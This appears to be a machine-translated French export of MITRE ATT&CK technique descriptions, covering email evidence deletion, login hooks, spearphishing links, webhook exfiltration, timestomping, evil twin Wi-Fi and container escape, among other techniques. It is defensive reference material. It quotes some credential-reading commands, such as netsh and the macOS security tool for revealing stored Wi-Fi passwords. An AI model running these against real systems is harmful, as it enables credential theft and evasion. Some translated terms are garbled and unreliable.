Les adversaires peuvent manipuler les e-mails et les données de la boîte aux lettres pour supprimer les journaux, les artefacts et les métadonnées, tels que les preuves d'[hameçonnage](https://attack.mitre.org/techniques/T1566)/[spearphishing interne](https://attack.mitre.org/techniques/T1534), [Collecte d’e-mails](https://attack.mitre.org/techniques/T1114), [Protocoles de messagerie](https://attack.mitre.org/techniques/T1071/003) pour la commande et le contrôle, ou l’exfiltration basée sur des e-mails tels que [Exfiltration sur une alternative Protocole](https://attack.mitre.org/techniques/T1048). Par exemple, pour supprimer des preuves sur les serveurs Exchange, les adversaires ont utilisé le module &lt;code&gt;ExchangePowerShell&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001), y compris &lt;code&gt;Remove-MailboxExportRequest&lt;/code&gt; pour supprimer les preuves d’exportations de boîtes aux lettres. (Citation : Volexity SolarWinds)(Citation : Module ExchangePowerShell) Sous Linux et macOS, les adversaires peuvent également supprimer des e-mails via un utilitaire de ligne de commande appelé &lt;code&gt;mail&lt;/code&gt; ou utiliser [AppleScript](https://attack.mitre.org/techniques/T1059/002) pour interagir avec les API sur macOS. (Citation : Cybereason Cobalt Kitty 2017)(Citation : page de manuel mailx)
Les adversaires peuvent également supprimer les e-mails et les métadonnées/en-têtes indiquant un spam ou une activité suspecte (par exemple, en utilisant des règles de transport à l’échelle de l’organisation) afin de réduire la probabilité que les e-mails malveillants soient détectés par les produits de sécurité. (Citation : Microsoft OAuth Spam 2022)
https://attack.mitre.org/techniques/T1070/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un hook de connexion pour établir la persistance exécutée lors de la connexion de l’utilisateur. Un hook de connexion est un fichier plist qui pointe vers un script spécifique à exécuter avec les privilèges root lors de la connexion de l’utilisateur. Le fichier plist se trouve dans le fichier &lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; et peut être modifié à l’aide &lt;code&gt;de l’utilitaire de ligne de commande defaults&lt;/code&gt;. Ce comportement est le même pour les hooks de déconnexion où un script peut être exécuté lors de la déconnexion de l’utilisateur. Tous les hooks nécessitent des autorisations d’administrateur pour modifier ou créer des hooks. (Citation : Scripts de connexion Apple Dev)(Citation : LoginWindowScripts Apple Dev) 
Les adversaires peuvent ajouter ou insérer un chemin d’accès à un script malveillant dans le fichier &lt;code&gt;com.apple.loginwindow.plist&lt;/code&gt;, à l’aide de la paire clé-valeur &lt;code&gt;LoginHook&lt;/code&gt; ou &lt;code&gt;LogoutHook&lt;/code&gt;. Le script malveillant est exécuté lors de la prochaine connexion de l’utilisateur. Si un hook de connexion existe déjà, les adversaires peuvent ajouter des commandes supplémentaires à un hook de connexion existant. Il ne peut y avoir qu’un seul hook de connexion et de déconnexion sur un système à la fois. (Citation : S1 macOs Persistence)(Citation : chapitre sur la persistance de Wardle)
Les hooks de connexion ont été dépréciés dans la version 10.11 de macOS en faveur de [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) et [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux victimes et communiquer en permanence avec elles en injectant du contenu malveillant dans les systèmes par le biais du trafic réseau en ligne. Plutôt que d’attirer les victimes vers des charges utiles malveillantes hébergées sur un site Web compromis (c’est-à-dire [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) suivi de [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), les adversaires peuvent d’abord accéder aux victimes par le biais de canaux de transfert de données compromis où ils peuvent manipuler le trafic et/ou injecter leur propre contenu. Ces canaux de réseau en ligne compromis peuvent également être utilisés pour fournir des charges utiles supplémentaires (c’est-à-dire [Transfert d’outil d’entrée][https://attack.mitre.org/techniques/T1105)) et d’autres données à des systèmes déjà compromis. (Citation : ESET MoustachedBouncer)
Les adversaires peuvent injecter du contenu dans les systèmes victimes de différentes manières, notamment :
* À partir du milieu, où l’adversaire se trouve entre des communications client-serveur en ligne légitimes (**Remarque :** ceci est similaire mais distinct de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), qui décrit l’activité AiTM uniquement dans un environnement d’entreprise) (Citation : Kaspersky Encyclopedia MiTM)
* De côté, où le contenu malveillant est injecté et se précipite vers le client en tant que fausse réponse aux demandes d’un serveur en ligne légitime (Citation : Kaspersky ManOnTheSide)
L’injection de contenu est souvent le résultat de canaux de communication en amont compromis, par exemple au niveau d’un fournisseur d’accès à Internet (FAI), comme c’est le cas pour « l’interception légale ». (Citation : Kaspersky ManOnTheSide)(Citation : ESET MoustachedBouncer)(Citation : Attaque GitHub de l’EFF en Chine)
https://attack.mitre.org/techniques/T1659</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code dans les processus afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection de processus est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution par injection de processus peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime. 
Il existe de nombreuses façons d’injecter du code dans un processus, dont beaucoup abusent de fonctionnalités légitimes. Ces implémentations existent pour tous les principaux systèmes d’exploitation, mais sont généralement spécifiques à la plate-forme. 
Des échantillons plus sophistiqués peuvent effectuer plusieurs injections de processus pour segmenter les modules et échapper davantage à la détection, en utilisant des tuyaux nommés ou d’autres mécanismes de communication inter-processus (IPC) comme canal de communication.
https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>"Des adversaires peuvent envoyer des courriels de spearphishing avec un lien malveillant pour tenter d'accéder aux systèmes des victimes. Le spearphishing avec lien est une variante spécifique du spearphishing. Elle se distingue des autres formes de spearphishing par l'utilisation de liens pour télécharger des logiciels malveillants contenus dans le courrier électronique, au lieu de joindre des fichiers malveillants au courrier électronique lui-même, afin d'éviter les défenses qui peuvent inspecter les pièces jointes des courriers électroniques. Le spearphishing peut également faire appel à des techniques d'ingénierie sociale, par exemple en se faisant passer pour une source fiable.
Toutes les formes de spearphishing sont des techniques d'ingénierie sociale diffusées par voie électronique et visant une personne, une entreprise ou un secteur d'activité spécifique. Dans ce cas, les courriels malveillants contiennent des liens. Généralement, les liens sont accompagnés d'un texte d'ingénierie sociale et demandent à l'utilisateur de cliquer activement ou de copier-coller une URL dans un navigateur, en tirant parti de l'[Exécution par l'utilisateur] (https://attack.mitre.org/techniques/T1204). Le site web visité peut compromettre le navigateur web à l'aide d'un exploit, ou l'utilisateur sera invité à télécharger des applications, des documents, des fichiers zip, voire des exécutables, en fonction du prétexte de l'envoi du courrier électronique.
Les adversaires peuvent également inclure des liens destinés à interagir directement avec un lecteur de courrier électronique, y compris des images intégrées destinées à exploiter directement le système final. En outre, les adversaires peuvent utiliser des liens apparemment inoffensifs qui abusent de caractères spéciaux pour imiter des sites web légitimes (ce que l'on appelle une « attaque par homographe IDN »). (Citation : CISA IDN ST05-016) Les URL peuvent également être obscurcies en tirant parti de bizarreries dans le schéma URL, telles que l'acceptation de formats de noms d'hôtes basés sur des nombres entiers ou hexadécimaux et le rejet automatique du texte précédant le symbole « @ » : par exemple, `hxxp://google.com@1157586937`. (Citation : Mandiant URL Obfuscation 2023)
Les adversaires peuvent également utiliser des liens pour effectuer du phishing de consentement, généralement avec des URL de demande OAuth 2.0 qui, lorsqu'elles sont acceptées par l'utilisateur, fournissent des autorisations/accès à des applications malveillantes, permettant aux adversaires de [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation : Trend Micro Pawn Storm OAuth 2017) Ces jetons d'accès volés permettent à l'adversaire d'effectuer diverses actions au nom de l'utilisateur par le biais d'appels API. (Citation : Microsoft OAuth 2.0 Consent Phishing 2021)
Les adversaires peuvent également utiliser des liens de spearphishing pour [Steal Application Access Token] (https://attack.mitre.org/techniques/T1528) qui donnent un accès immédiat à l'environnement de la victime. Par exemple, un utilisateur peut être incité, par le biais d'un « phishing de consentement », à accorder à des adversaires des autorisations/accès via une URL de demande OAuth 2.0 malveillante (Citation : Trend Micro Pawn Storm OAuth 2017) (Citation : Microsoft OAuth 2.0 Consent Phishing 2021).
De même, les liens malveillants peuvent également cibler l'autorisation basée sur l'appareil, comme le flux d'autorisation d'appareil OAuth 2.0 qui est généralement utilisé pour authentifier les appareils sans interface utilisateur/navigateur. Connu sous le nom de "phishing du code de l'appareil", un adversaire peut envoyer un lien qui dirige la victime vers une page d'autorisation malveillante où l'utilisateur est incité à saisir un code/des informations d'identification qui produisent un jeton d'appareil.(Citation : SecureWorks Device Code Phishing 2021)(Citation : Netskope Device Code Phishing 2021)(Citation : Optiv Device Code Phishing 2021)
https://attack.mitre.org/techniques/T1566/002"</t>
  </si>
  <si>
    <t>"Les adversaires peuvent envoyer des messages de spearphishing avec un lien malveillant pour obtenir des informations sensibles qui peuvent être utilisées lors du ciblage. Le spearphishing pour obtenir des informations est une tentative de tromper les cibles pour qu'elles divulguent des informations, souvent des informations d'identification ou d'autres informations exploitables. Le spearphishing pour obtenir des informations fait souvent appel à des techniques d'ingénierie sociale, telles que se faire passer pour une source ayant une raison de collecter des informations (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)) et/ou envoyer de multiples messages apparemment urgents.
Toutes les formes de spearphishing sont des techniques d'ingénierie sociale diffusées par voie électronique et ciblées sur une personne, une entreprise ou un secteur d'activité spécifique. Dans ce scénario, les courriels malveillants contiennent des liens généralement accompagnés d'un texte d'ingénierie sociale visant à inciter l'utilisateur à cliquer activement ou à copier et coller une URL dans un navigateur. (Citation : TrendMictro Phishing) (Citation : PCMag FakeLogin) Le site web donné peut être un clone d'un site légitime (tel qu'un portail de connexion en ligne ou d'entreprise) ou peut ressembler étroitement à un site légitime en apparence et avoir une URL contenant des éléments du site réel. Les URL peuvent également être obscurcies en tirant parti de bizarreries dans le schéma URL, telles que l'acceptation de formats de noms d'hôtes basés sur des nombres entiers ou hexadécimaux et l'élimination automatique du texte précédant le symbole « @ » : par exemple, `hxxp://google.com@1157586937`.(Citation : Mandiant URL Obfuscation 2023)
Les adversaires peuvent également intégrer des « pixels de suivi », des « web bugs » ou des « web beacons » dans les messages d'hameçonnage pour vérifier la réception d'un courriel, tout en établissant potentiellement un profil et en suivant les informations de la victime telles que l'adresse IP (Citation : NIST Web Bug) (Citation : Ryte Wiki) Ces mécanismes apparaissent souvent sous la forme de petites images (généralement d'une taille d'un pixel) ou d'autres objets obscurcis et sont généralement livrés sous forme de code HTML contenant un lien vers un serveur distant (Citation : Ryte Wiki). (Citation : Ryte Wiki)(Citation : IAPP)
Les adversaires peuvent également être en mesure d'usurper un site web complet en utilisant ce qui est connu sous le nom d'attaque « browser-in-the-browser » (BitB). En générant une fausse fenêtre contextuelle de navigateur avec une barre d'adresse HTML qui semble contenir une URL légitime (comme un portail d'authentification), ils peuvent être en mesure d'inviter les utilisateurs à saisir leurs informations d'identification tout en contournant les méthodes habituelles de vérification des URL.(Citation : ZScaler BitB 2020)(Citation : Mr. D0x BitB 2022)
Les adversaires peuvent utiliser des kits d'hameçonnage tels que `EvilProxy` et `Evilginx2` pour effectuer un hameçonnage de type adversary-in-the-middle (adversaire au milieu) en établissant une connexion entre la victime et le site web légitime. Lors d'une connexion réussie, la victime est redirigée vers le site web légitime, tandis que l'adversaire capture son cookie de session (c'est-à-dire [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) en plus de son nom d'utilisateur et de son mot de passe. Cela peut permettre à l'adversaire de contourner le MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004). (Citation : Proofpoint Human Factor)
Les adversaires peuvent également envoyer un lien malveillant sous la forme d'un code de réponse rapide (QR) (également connu sous le nom de « quishing »). Ces liens peuvent diriger la victime vers une page d'hameçonnage d'informations d'identification (Citation : QR-campaign-energy-firm). En utilisant un code QR, l'URL peut ne pas être exposée dans l'e-mail et peut donc ne pas être détectée par la plupart des analyses automatiques de sécurité des e-mails (Citation : qr-phish-agriculture). Ces codes QR peuvent être scannés par l'appareil mobile de l'utilisateur ou lui être envoyés directement (c'est-à-dire, [Phishing] (https://attack.mitre.org/techniques/T1660)), ce qui peut être moins sûr à plusieurs égards. (Citation : qr-phish-agriculture) Par exemple, les utilisateurs mobiles peuvent ne pas être en mesure de remarquer les différences mineures entre les sites Web authentiques et les sites Web de collecte d'informations d'identification en raison du facteur de forme plus petit du téléphone portable.
Sur le faux site web, les informations sont recueillies dans des formulaires web et envoyées à l'adversaire. Les adversaires peuvent également utiliser des informations provenant d'efforts de reconnaissance antérieurs (par exemple : [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) ou [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) pour créer des leurres persuasifs et crédibles.
https://attack.mitre.org/techniques/T1598/003"</t>
  </si>
  <si>
    <t>Les adversaires peuvent exfiltrer des données vers un point de terminaison de webhook plutôt que sur leur canal de commande et de contrôle principal. Les webhooks sont des mécanismes simples permettant à un serveur de pousser des données via HTTP/S vers un client sans que le client ait besoin d’interroger continuellement le serveur. (Citation : Webhooks RedHat) De nombreux services publics et commerciaux, tels que Discord, Slack et « webhook.site », prennent en charge la création de points de terminaison de webhook qui peuvent être utilisés par d’autres services, tels que Github, Jira ou Trello. (Citation : Discord Intro to Webhooks) Lorsque des modifications se produisent dans les services liés (par exemple, l’envoi d’une mise à jour du référentiel ou la modification d’un ticket), ces services publient automatiquement les données sur le point de terminaison du webhook pour être utilisées par l’application consommane. 
Les adversaires peuvent lier un environnement appartenant à l’adversaire à un service SaaS appartenant à la victime pour réaliser une [exfiltration automatisée](https://attack.mitre.org/techniques/T1020) répétée d’e-mails, de messages de chat et d’autres données. (citation : Webhooks du référentiel d’attaques SaaS de sécurité push) Alternativement, au lieu de lier le point de terminaison du webhook à un service, un adversaire peut publier manuellement des données préparées directement sur l’URL afin de les exfiltrer. (Citation : Microsoft SQL Server)
L’accès aux points de terminaison de webhook se fait souvent via HTTPS, ce qui donne à l’adversaire un niveau de protection supplémentaire. L’exfiltration utilisant des webhooks peut également se fondre dans le trafic réseau normal si le point de terminaison du webhook pointe vers une application SaaS ou un service de collaboration couramment utilisé. (Citation : CyberArk Labs Discord)(Citation : Abus de webhook Talos Discord)(Citation : Webhooks de Checkmarx)
https://attack.mitre.org/techniques/T1567/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser la signalisation routière pour masquer des ports ouverts ou d’autres fonctionnalités malveillantes utilisées pour la persistance ou la commande et le contrôle. La signalisation routière implique l’utilisation d’une valeur magique ou d’une séquence qui doit être envoyée à un système pour déclencher une réponse spéciale, telle que l’ouverture d’un port fermé ou l’exécution d’une tâche malveillante. Cela peut prendre la forme de l’envoi d’une série de paquets présentant certaines caractéristiques avant l’ouverture d’un port que l’adversaire peut utiliser pour la commande et le contrôle. Habituellement, cette série de paquets consiste en des tentatives de connexion à une séquence prédéfinie de ports fermés (c’est-à-dire [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), mais peut impliquer des drapeaux inhabituels, des chaînes spécifiques ou d’autres caractéristiques uniques. Une fois la séquence terminée, l’ouverture d’un port peut être effectuée par le pare-feu basé sur l’hôte, mais peut également être mise en œuvre par un logiciel personnalisé.
Les adversaires peuvent également communiquer avec un port déjà ouvert, mais le service qui écoute sur ce port ne répondra aux commandes ou ne déclenchera d’autres fonctionnalités malveillantes que si la ou les valeurs magiques appropriées sont passées.
L’observation des paquets de signaux pour déclencher la communication peut être effectuée par différentes méthodes. Un moyen, mis en œuvre à l’origine par Cd00r (Citation : Hartrell cd00r 2002), est d’utiliser les bibliothèques libpcap pour renifler les paquets en question. Une autre méthode exploite les sockets bruts, ce qui permet au logiciel malveillant d’utiliser des ports déjà ouverts pour être utilisés par d’autres programmes.
Sur les périphériques réseau, les adversaires peuvent utiliser des paquets contrefaits pour activer [l’authentification des périphériques réseau](https://attack.mitre.org/techniques/T1556/004) pour les services standard proposés par le périphérique, tels que telnet.  Une telle signalisation peut également être utilisée pour ouvrir un port de service fermé tel que telnet, ou pour déclencher la modification de module d’implants de logiciels malveillants sur l’appareil, en ajoutant, supprimant ou modifiant des capacités malveillantes.  Les adversaires peuvent utiliser des paquets contrefaits pour tenter de se connecter à un ou plusieurs ports (ouverts ou fermés), mais peuvent également tenter de se connecter à une interface de routeur, à une diffusion et à une adresse IP réseau sur le même port afin d’atteindre leurs buts et objectifs. (Citation : Cisco Synful Knock Evolution)(Citation : Mandiant - Synful Knock)(Citation : Blog Cisco Legacy Device Attacks)  Pour activer cette signalisation de trafic sur les périphériques intégrés, les adversaires doivent d’abord réaliser et exploiter [Patch System Image](https://attack.mitre.org/techniques/T1601/001) en raison de la nature monolithique de l’architecture.
Les adversaires peuvent également utiliser la fonction Wake-on-LAN pour allumer les systèmes hors tension. Wake-on-LAN est une fonctionnalité matérielle qui permet à un système hors tension d’être mis sous tension, ou réveillé, en lui envoyant un paquet magique. Une fois le système sous tension, il peut devenir une cible pour les mouvements latéraux. (Citation : Ordinateur Bleeping - Ryuk WoL)(Citation : AMD Magic Packet)
https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser les [comptes valides](https://attack.mitre.org/techniques/T1078) pour se connecter directement à une infrastructure de calcul hébergée dans le cloud accessible via des méthodes natives du cloud. De nombreux fournisseurs de cloud proposent des connexions interactives à l’infrastructure virtuelle accessible via l'[API cloud](https://attack.mitre.org/techniques/T1059/009), telle que Azure Serial Console (Référence : Azure Serial Console), AWS EC2 Instance Connect (Référence : EC2 Instance Connect) (Référence : lucr-3 : Obtention de SaaS-y dans le cloud) et AWS System Manager. (Citation : AWS System Manager).
Les méthodes d’authentification de ces connexions peuvent inclure des mots de passe, des jetons d’accès à l’application ou des clés SSH. Ces méthodes cloud natives peuvent, par défaut, autoriser un accès privilégié sur l’hôte avec un accès SYSTEM ou de niveau racine. 
Les adversaires peuvent utiliser ces méthodes cloud natives pour accéder directement à l’infrastructure virtuelle et pivoter dans un environnement. (Citation : Échange de carte SIM et abus de la console série Microsoft Azure) Ces connexions fournissent généralement un accès direct à la console virtuelle plutôt que l’exécution de scripts (c’est-à-dire [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).
https://attack.mitre.org/techniques/T1021/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les défenses basées sur le processus et/ou les signatures en mandatant l’exécution de contenu malveillant avec des binaires signés ou de confiance. Les fichiers binaires utilisés dans cette technique sont souvent des fichiers signés par Microsoft, ce qui indique qu’ils ont été téléchargés à partir de Microsoft ou qu’ils sont déjà natifs dans le système d’exploitation. (Citation : Projet LOLBAS) Les fichiers binaires signés avec des certificats numériques approuvés peuvent généralement s’exécuter sur des systèmes Windows protégés par la validation de signature numérique. Plusieurs fichiers binaires signés par Microsoft qui sont par défaut sur les installations Windows peuvent être utilisés pour l’exécution proxy d’autres fichiers ou commandes.
De même, sur les systèmes Linux, les adversaires peuvent abuser de fichiers binaires de &lt;code&gt;confiance, tels&lt;/code&gt; que l’exécution de commandes malveillantes. (Citation : page de manuel divisée)(Citation : s’en aller divisé)
https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les attributs de temps de fichier pour masquer de nouveaux fichiers ou des modifications apportées à des fichiers existants. Le timetomping est une technique qui modifie les horodatages d’un fichier (modifier, accéder, créer et changer les heures), souvent pour imiter les fichiers qui se trouvent dans le même dossier et mélanger des fichiers malveillants avec des fichiers légitimes.
Les attributs '$STANDARD_INFORMATION' ('$SI') et '$FILE_NAME' ('$FN') attribuent les temps d’enregistrement dans un fichier MFT (Master File Table). (Citation : Inversecos Timestomping 2022) '$SI' (dates/horodatages) est affiché à l’utilisateur final, y compris dans la vue du système de fichiers, tandis que '$FN' est traité par le noyau. (Citation : Magnet Forensics)
La modification de l’attribut '$SI' est la méthode la plus courante de timetomping, car elle peut être modifiée au niveau de l’utilisateur à l’aide d’appels API. Cependant, le timetomping '$FN nécessite généralement d’interagir avec le noyau du système ou de déplacer ou de renommer un fichier. (Citation : Inversecos Timestomping 2022)
Les adversaires modifient les horodatages des fichiers afin qu’ils n’apparaissent pas visibles aux enquêteurs ou aux outils d’analyse de fichiers. Afin d’éviter les détections qui reposent sur l’identification des écarts entre les attributs « $SI » et « $FN », les adversaires peuvent également se livrer à un « double timetomping » en modifiant les temps sur les deux attributs simultanément. (Citation : Double Timetomping)
Timestomping peut être utilisé avec le nom de fichier [Masquerading](https://attack.mitre.org/techniques/T1036) pour masquer les logiciels malveillants et les outils. (Citation : Techniques anti-criminalistiques WindowsIR)
https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent héberger des points d’accès Wi-Fi apparemment authentiques pour inciter les utilisateurs à se connecter à des réseaux malveillants afin de soutenir des comportements ultérieurs tels que [Reniflage de réseau](https://attack.mitre.org/techniques/T1040), [Manipulation de données transmises](https://attack.mitre.org/techniques/T1565/002) ou [Capture d’entrée](https://attack.mitre.org/techniques/T1056). (Citation : Australie 'Evil Twin')
En utilisant un SSID (Service Set Identifier) d’un réseau Wi-Fi légitime, les points d’accès Wi-Fi frauduleux peuvent inciter les appareils ou les utilisateurs à se connecter à des réseaux Wi-Fi malveillants. (Citation : Jumeau maléfique de Kaspersky)(Citation : jumeau moyen-maléfique)  Les adversaires peuvent fournir un signal plus puissant ou bloquer l’accès aux points d’accès Wi-Fi pour contraindre ou inciter les appareils victimes à se connecter à des réseaux malveillants. (Citation : spectre ops jumeau maléfique)  Un Wi-Fi Pineapple – un outil d’audit de sécurité réseau et de test d’intrusion – peut être déployé dans les attaques Evil Twin pour une facilité d’utilisation et une portée plus large. Des certificats personnalisés peuvent être utilisés pour tenter d’intercepter le trafic HTTPS. 
De même, les adversaires peuvent également écouter les appareils clients qui envoient des demandes de sonde pour des réseaux connus ou précédemment connectés (listes de réseaux préférés ou PNL). Lorsqu’un point d’accès malveillant reçoit une demande de sonde, les adversaires peuvent répondre avec le même SSID pour imiter le réseau de confiance et connu. (Citation : spectre ops jumeau maléfique)  Les appareils victimes sont amenés à croire que le point d’accès répondant provient de leur PNL et initient une connexion au réseau frauduleux.
Lorsqu’il se connecte au point d’accès Wi-Fi malveillant, un utilisateur peut être redirigé vers une fausse page de connexion ou une page Web de portail captif pour capturer les informations d’identification de la victime. Une fois qu’un utilisateur est connecté au réseau Wi-Fi frauduleux, l’adversaire peut être en mesure de surveiller l’activité du réseau, de manipuler des données ou de voler des informations d’identification supplémentaires. Les endroits où les concentrations d’accès Wi-Fi public sont élevées, tels que les aéroports, les cafés ou les bibliothèques, peuvent être la cible d’adversaires qui cherchent à mettre en place des points d’accès Wi-Fi illégitimes.
https://attack.mitre.org/techniques/T1557/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent charger du code de manière réfléchie dans un processus afin de dissimuler l’exécution de charges utiles malveillantes. Le chargement réfléchi consiste à allouer puis à exécuter des charges utiles directement dans la mémoire du processus, au lieu de créer un thread ou un processus soutenu par un chemin de fichier sur le disque (par exemple, [Modules partagés](https://attack.mitre.org/techniques/T1129)).
Les charges utiles chargées de manière réfléchie peuvent être des binaires compilés, des fichiers anonymes (uniquement présents dans la RAM) ou simplement des snob de code exécutable sans fichier (ex : shellcode indépendant de la position). (Citation : Présentation du beignet)(Citation : S1 Custom Shellcode Tool)(Citation : Mémoire de Stuart ELF)(Citation : 00sec Droppers)(Citation : Mandiant BYOL) Par exemple, la méthode 'Assembly.Load()' exécutée par [PowerShell](https://attack.mitre.org/techniques/T1059/001) peut être utilisée de manière abusive pour charger du code brut dans le processus en cours d’exécution. (Citation : Microsoft AssemblyLoad)
L’injection de code réfléchissante est très similaire à l’injection de processus(https://attack.mitre.org/techniques/T1055), sauf que l’injection charge le code dans la mémoire des processus au lieu de celle d’un processus distinct. Le chargement réfléchi peut échapper aux détections basées sur le processus, car l’exécution du code arbitraire peut être masquée dans un processus légitime ou autrement bénin. Le chargement réfléchi des charges utiles directement en mémoire peut également éviter de créer des fichiers ou d’autres artefacts sur le disque, tout en permettant aux logiciels malveillants de conserver ces charges utiles chiffrées (ou obscurcies) jusqu’à l’exécution. (Citation : Mémoire de Stuart ELF)(Citation : 00sec Droppers)(Citation : Intezer ACBackdoor)(Citation : S1 Old Rat New Tricks)
https://attack.mitre.org/techniques/T1620</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des informations sur les réseaux Wi-Fi, telles que des noms et des mots de passe de réseau, sur des systèmes compromis. Les adversaires peuvent utiliser les informations Wi-Fi dans le cadre de [Découverte de compte](https://attack.mitre.org/techniques/T1087), [Découverte de système à distance](https://attack.mitre.org/techniques/T1018) et d’autres activités de découverte ou d'[Accès aux informations d’identification](https://attack.mitre.org/tactics/TA0006) pour soutenir les campagnes en cours et futures.
Les adversaires peuvent collecter divers types d’informations sur les réseaux Wi-Fi auprès des hôtes. Par exemple, sous Windows, les noms et mots de passe de tous les réseaux Wi-Fi auxquels un appareil s’est précédemment connecté peuvent être disponibles via « netsh wlan show profiles » pour énumérer les noms Wi-Fi, puis « netsh wlan show profile « Wi-Fi name » key=clear » pour afficher le mot de passe correspondant d’un réseau Wi-Fi. (Citation : BleepingComputer Agent Tesla vole des mots de passe wifi)(Citation : Malware Bytes New AgentLa variante Tesla vole les informations d’identification WiFi)(Citation : Check Point APT35 CharmPower janvier 2022) De plus, les noms et autres détails des réseaux Wi-Fi accessibles localement peuvent être découverts à l’aide d’appels aux fonctions « wlanAPI.dll » [API native](https://attack.mitre.org/techniques/T1106). (Citation : Binary Defense Emotes Wi-Fi Spreader)
Sous Linux, les noms et mots de passe de tous les réseaux Wi-Fi auxquels un appareil s’est précédemment connecté peuvent être disponibles dans des fichiers sous ' /etc/NetworkManager/system-connections/ ». (citation : Mot de passe Wi-Fi de tous les réseaux connectés sous Windows/Linux) Sur macOS, le mot de passe d’un Wi-Fi connu peut être identifié par ' security find-generic-password -wa wifiname' (nécessite un nom d’utilisateur/mot de passe admin). (Citation : Trouver un mot de passe Wi-Fi sur Mac)
https://attack.mitre.org/techniques/T1016/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent limiter l’exécution ou les actions en fonction de la présence d’un mutex associé à un logiciel malveillant. Un mutex est un mécanisme de verrouillage utilisé pour synchroniser l’accès à une ressource. Un seul thread ou processus peut acquérir un mutex à un moment donné. (Citation : Microsoft Mutexes)
Alors que les mutex locaux n’existent qu’au sein d’un processus donné, permettant à plusieurs threads de synchroniser l’accès à une ressource, les mutex système peuvent être utilisés pour synchroniser les activités de plusieurs processus. (Citation : Microsoft Mutexes) En créant un mutex système unique associé à un logiciel malveillant particulier, les adversaires peuvent vérifier si un système a déjà été compromis ou non. (Citation : Sans Mutexes 2012)
Dans les environnements Linux, les logiciels malveillants peuvent tenter d’acquérir un verrou sur un fichier mutex. Si le logiciel malveillant parvient à acquérir le verrou, il continue à s’exécuter ; S’il échoue, il se ferme pour éviter de créer une deuxième instance de lui-même. (Citation : Intezer RedXOR 2021)(Citation : Deep Instinct BPFDoor 2023)
Les noms muteux peuvent être codés en dur ou générés dynamiquement à l’aide d’un algorithme prévisible. (Citation : ICS Mutexes 2015)
https://attack.mitre.org/techniques/T1480/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les mécanismes défensifs en exécutant des commandes qui se cachent des signaux d’interruption de processus. De nombreux systèmes d’exploitation utilisent des signaux pour transmettre des messages afin de contrôler le comportement du processus. Les interpréteurs de commandes incluent souvent des commandes/indicateurs spécifiques qui ignorent les erreurs et autres blocages, par exemple lorsque l’utilisateur de la session active se déconnecte. Ces signaux d’interruption peuvent également être utilisés par des outils défensifs et/ou des analystes pour suspendre ou terminer des processus en cours d’exécution spécifiés. 
Les adversaires peuvent appeler des processus à l’aide de 'nohup', [PowerShell](https://attack.mitre.org/techniques/T1059/001) '-ErrorAction SilentlyContinue' ou de commandes similaires qui peuvent être à l’abri des blocages. (Citation : nohup Linux Man)(Citation : Microsoft PowerShell SilentlyContinue) Cela peut permettre à des commandes malveillantes et à des programmes malveillants de poursuivre leur exécution par le biais d’événements système qui mettraient autrement fin à son exécution, tels que la déconnexion des utilisateurs ou l’arrêt de sa connexion réseau C2.
Le masquage des signaux d’interruption de processus peut permettre au logiciel malveillant de poursuivre son exécution, mais contrairement à [Trap](https://attack.mitre.org/techniques/T1546/005), cela n’établit pas [Persistance](https://attack.mitre.org/tactics/TA0003) puisque le processus ne sera pas réinvoqué une fois terminé.
https://attack.mitre.org/techniques/T1564/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent s’échapper d’un conteneur pour accéder à l’hôte sous-jacent. Cela peut permettre à un adversaire d’accéder à d’autres ressources conteneurisées à partir du niveau de l’hôte ou de l’hôte lui-même. En principe, les ressources conteneurisées doivent fournir une séparation claire des fonctionnalités de l’application et être isolées de l’environnement hôte. (Citation : Présentation de Docker)
Il existe plusieurs façons pour un adversaire de s’échapper vers un environnement hôte. Par exemple, la création d’un conteneur configuré pour monter le système de fichiers de l’hôte à l’aide du paramètre bind, qui permet à l’adversaire de supprimer des charges utiles et d’exécuter des utilitaires de contrôle tels que cron sur l’hôte ; l’utilisation d’un conteneur privilégié pour exécuter des commandes ou charger un module de noyau malveillant sur l’hôte sous-jacent ; ou en abusant des appels système tels que « unshare » et « keyctl » pour élever les privilèges et voler des secrets. (Citation : Docker Bind Mounts)(Citation : Trend Micro Privileged Container)(Citation : Intezer Doki 20 juillet)(Citation : Évasion de conteneur)(Citation : Crowdstrike Kubernetes Container Escape)(Citation : Keyctl-unmask)
